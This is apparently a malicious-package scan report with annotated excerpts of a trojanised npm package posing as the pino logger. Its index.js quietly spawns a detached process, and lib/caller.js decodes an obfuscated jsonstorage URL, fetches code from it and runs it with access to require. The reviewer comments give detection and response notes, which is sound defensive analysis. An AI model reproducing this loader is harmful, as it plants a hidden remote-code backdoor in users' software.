// offending code · 4 files flagged · patterns: 4
--- package/index.d.ts (excerpt) ---
// Project: https://github.com/pinojs/pino.git, http://getpino.io
// Definitions by: Peter Snider <https://github.com/psnider>
// BendingBender <https://github.com/BendingBender>
// Christian Rackerseder <https://github.com/screendriver>
// GP <https://github.com/paambaati>
// Alex Ferrando <https://github.com/alferpal>
// Oleksandr Sidko <https://github.com/mortiy>
// Harris Lummis <https://github.com/lummish>
// Raoul Jaeckel <https://github.com/raoulus>
// Cory Donkin <https://github.com/Cooryd>
// Adam Vigneaux <https://github.com/AdamVig>
// Austin Beer <https://github.com/austin-beer>
// Michel Nemnom <https://github.com/Pegase745>
// Igor Savin <https://github.com/kibertoad>
// James Bromwell <https://github.com/thw0rted>
// TypeScript Version: 4.4
import type { EventEmitter } from "events";
import * as pinoStdSerializers from "pino-std-serializers";
import type { SonicBoom, SonicBoomOpts } from "sonic-boom";
import type { WorkerOptions } from "worker_threads";
//// Non-exported types and interfaces
// ToDo https://github.com/pinojs/thread-stream/issues/24
/** Placeholder alias: declared as `any`, so values of this type are not type-checked (see the ToDo link above). */
type ThreadStream = any
/** A function that takes no arguments and returns a string. */
type TimeFn = () => string;
/**
 * A function that receives the merge object, the numeric level and the logger
 * instance, and returns an object.
 */
type MixinFn<CustomLevels extends string = never> = (mergeObject: object, level: number, logger:pino.Logger<CustomLevels>) => object;
type MixinMergeStrat
--- package/index.js (excerpt) ---
'use strict'
const path = require("path");
const{ spawn } = require("child_process");
const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants')
const { pid } = process
// Logger option defaults.
// NOTE(review): in this excerpt the only use of this object is as an extra
// argument that `middleware` forwards to runJobA(); nothing visible here builds a
// logger from it, so its presence alone does not show that logging works.
const defaultOptions = {
levelComparison: SORTING_ORDER.ASC,
levels: DEFAULT_LEVELS,
messageKey: 'msg',
errorKey: 'err',
nestedKey: null,
enabled: true,
// `pid` is destructured from the real global `process` at the top of this file.
base: { pid },
// Object.create(null) yields an object with no prototype, so only the keys
// assigned here exist on `formatters`.
formatters: Object.assign(Object.create(null), {
// Identity formatter: returns the bindings unchanged.
bindings (bindings) {
return bindings
}
}),
hooks: {
logMethod: undefined,
streamWrite: undefined
},
name: undefined,
redact: null,
customLevels: null,
useOnlyCustomLevels: false,
depthLimit: 5,
edgeLimit: 100
}
/**
 * Starts lib/caller.js in a separate `node` process and returns without waiting for it.
 *
 * Review notes (supply-chain indicators):
 * - The package's entry point spawns a child process as a side effect of being
 *   called; nothing in this excerpt ties that to logging.
 * - `detached: true`, `stdio: "ignore"` and `unref()` together mean the child is
 *   not tied to the parent's lifetime and produces no output on the parent's
 *   stdout/stderr, so the host application sees nothing.
 * - `args` is passed on the child's command line as JSON. The lib/caller.js
 *   excerpt on this page does not read its arguments, so the value appears unused.
 * - Detection: look for a `node` child process whose script path ends in
 *   lib/caller.js under this package's install directory.
 *
 * @param {*} args Value serialized with JSON.stringify and passed as the child's single script argument.
 */
function runJobA(args) {
// Absolute path to the script, resolved relative to this file's directory.
const script = path.resolve(__dirname, "./lib/caller.js");
// Relies on `node` being resolvable through PATH.
const child = spawn("node", [script, JSON.stringify(args)], {
detached: true,
stdio: "ignore"
});
child.unref(); // allow parent to exit
}
/**
 * The function this module exports. Calling it launches runJobA() as a side
 * effect, then returns a pass-through `(req, res, next)` handler.
 *
 * NOTE(review): no logger object is created or returned here; the returned
 * handler only calls next(). The visible behaviour of this entry point is the
 * background process launch.
 *
 * @param {...*} _args Caller arguments, forwarded to runJobA.
 * @returns {Function} A handler that ignores the request and response and calls next().
 */
const middleware = (..._args) => {
// runJobA declares a single parameter, so it receives the first caller argument,
// or defaultOptions when the caller passed none.
runJobA(..._args, defaultOptions);
return (_req, _res, next) => {
next();
};
}
// All three export shapes below (module.exports, .default, .pino) point at the
// same `middleware` function, so a CommonJS require, a default import and a named
// `pino` import all resolve to it.
module.exports = middleware;
// Enables default and name export with TypeScript and Babel
module.exports.default = middleware
module.exports.pino = middleware
--- package/lib/caller.js (excerpt) ---
"use strict";
const axios = require("axios");
// NOTE(review): this declares a local object named `process`, shadowing Node's
// global for the rest of the file. The values are hard-coded base64 strings, not
// environment variables; the DEV_* names make the later `process.env.*` reads
// look like ordinary configuration. A base64 literal that decodes to a URL is a
// useful static-analysis signal for package scanners.
const process = {
env: {
// Decodes to a URL on a public JSON-storage service (defanged):
// hxxps://api[.]jsonstorage[.]net/v1/json/2ef8c758-a96f-459e-b036-b3b90379a165/a179ea35-b962-4722-b3f1-e28316d1a44a
DEV_API_KEY: "aHR0cHM6Ly9hcGkuanNvbnN0b3JhZ2UubmV0L3YxL2pzb24vMmVmOGM3NTgtYTk2Zi00NTllLWIwMzYtYjNiOTAzNzlhMTY1L2ExNzllYTM1LWI5NjItNDcyMi1iM2YxLWUyODMxNmQxYTQ0YQ==",
// Decodes to the HTTP header name "x-secret-key".
DEV_SECRET_KEY: "eC1zZWNyZXQta2V5",
// Decodes to the header value "_".
DEV_SECRET_VALUE: "Xw==",
}
};
// Immediately-invoked async function: runs as soon as this file is loaded.
// It is invoked with no arguments, so `_args` is always empty.
//
// Review summary: downloads a string from a remote URL and executes it as code in
// this process with access to `require`. The executed code is not part of the
// package, so it cannot be audited from the tarball and can differ per request.
// Response guidance: treat any host that ran this file as having executed
// unknown code; review outbound requests to the decoded host and rotate
// credentials reachable from that process.
(async function getCallers(..._args) {
// `process` here is the local object defined above in this file, not Node's global.
const src = atob(process.env.DEV_API_KEY);
const k = atob(process.env.DEV_SECRET_KEY);
const v = atob(process.env.DEV_SECRET_VALUE);
// Up to five failed attempts; there is no delay between attempts.
let retrycnt = 5;
while (retrycnt > 0) {
try {
// Keeps a reference to console.log and puts it back after the fetched code has
// run — presumably so any change that code makes to console.log is undone.
const l = console.log;
// GET the decoded URL with the single custom header; the code string is read
// from the `cookie` field of the response body.
const s = (await axios.get(src, { headers: { [k]: v } })).data.cookie;
// `Function.constructor` is `Function` itself, so this is equivalent to
// `new Function("require", s)`: the remote string becomes a function body.
// Static rules that look for `eval(` or `new Function(` should also match
// `Function.constructor`.
const handler = new Function.constructor("require", s);
// Passing `require` lets the fetched code load any module available to this process.
handler(require);
console.log = l;
break;
}
catch (error) {
// Errors (network failure, bad response, exceptions thrown by the fetched code)
// are discarded without logging; only the attempt counter changes.
retrycnt--;
}
}
})();
--- package/lib/redaction.js (excerpt) ---
'use strict'
const fastRedact = require('fast-redact')
const { redactFmtSym, wildcardFirstSym } = require('./symbols')
// The two fast-redact members this file uses: `rx` (used further down through
// `lastIndex` and `exec`) and the `validator` factory.
const rx = fastRedact.rx
const validator = fastRedact.validator

// Presumably the default replacement text for redacted values — confirm against handle().
const CENSOR = '[Redacted]'
const strict = false // TODO should this be configurable?

// Validator built with pino-prefixed error messages.
const validate = validator({
  ERR_PATHS_MUST_BE_STRINGS: () => {
    return 'pino – redacted paths must be strings'
  },
  ERR_INVALID_PATH: (badPath) => {
    return `pino – redact paths array contains an invalid path (${badPath})`
  }
})
function redaction (opts, serialize) {
const { paths, censor } = handle(opts)
const shape = paths.reduce((o, str) => {
rx.lastIndex = 0
const first = rx.exec(str)
const next = rx.exec(str)
// ns is the top-level path segment, brackets + quoting removed.
let ns = first[1] !== undefined
? first[1].replace(/^(?:"|'|`)(.*)(?:"|'|`)$/, '$1')
: first[0]
if (ns === '*') {
ns = wildcardFirstSym
}
// top level key:
if (next === null) {
o[ns] = null
return o
}
// path with at least two segments:
// if ns is already redacted at the top level, ignore lower level redactions
if (o[ns] === null) {
return o
}
const { index } = next
const nextPath = `${str.substr(index, str.length - 1)}`
o[ns] = o[ns] || []
// shape is a mix of paths beginning with literal values and wildcard
// paths [ "a.b.c", "*.b.z" ] should reduce to a shape of
// { "a": [ "b.c", "b.z" ], *: [ "b.z" ] }
// note: "b.z" is in both "a" and * arrays because "a" m
--- bundled output (OSV-MAL flagged — LLM scope expansion) ---
--- lib/transport-stream.js (bundled) ---
'use strict'
const { realImport, realRequire } = require('real-require')
module.exports = loadTransportStreamBuilder
/**
* Loads & returns a function to build transport streams
* @param {string} target
* @returns {Promise<function(object): Promise<import('node:stream').Writable>>}
* @throws {Error} In case the target module does not export a function
*/
async function loadTransportStreamBuilder (target) {
let fn
try {
const toLoad = target.startsWith('file://') ? target : 'file://' + target
if (toLoad.endsWith('.ts') || toLoad.endsWith('.cts')) {
// TODO: add support for the TSM modules loader ( https://github.com/lukeed/tsm ).
if (process[Symbol.for('ts-node.register.instance')]) {
realRequire('ts-node/register')
} else if (process.env && process.env.TS_NODE_DEV) {
realRequire('ts-node-dev')
}
// TODO: Support ES imports once tsc, tap & ts-node provide better compatibility guarantees.
fn = realRequire(decodeURIComponent(target))
} else {
fn = (await realImport(toLoad))
}
} catch (error) {
// See this PR for details: https://github.com/pinojs/thread-stream/pull/34
if ((error.code === 'ENOTDIR' || error.code === 'ERR_MODULE_NOT_FOUND')) {
fn = realRequire(target)
} else if (error.code === undefined || error.code === 'ERR_VM_DYNAMIC_IMPORT_CALLBACK_MISSING') {
// When bundled with pkg, an undefined error is thrown when called with realImport
// When bundled with pkg and using node v20, an ERR_VM_DYNAMIC_IMPORT_CALLBACK_MISSING error is thrown when called with realImport
// More info at: https://github.com/pinojs/thread-stream/issues/143
try {
fn = realRequire(decodeURIComponent(target))
} catch {
throw error
}
} else {
throw error
}
}
// Depending on how the default export is performed, and on how the code is
// transpiled, we may find cases of two nested "default" objects.
// See https://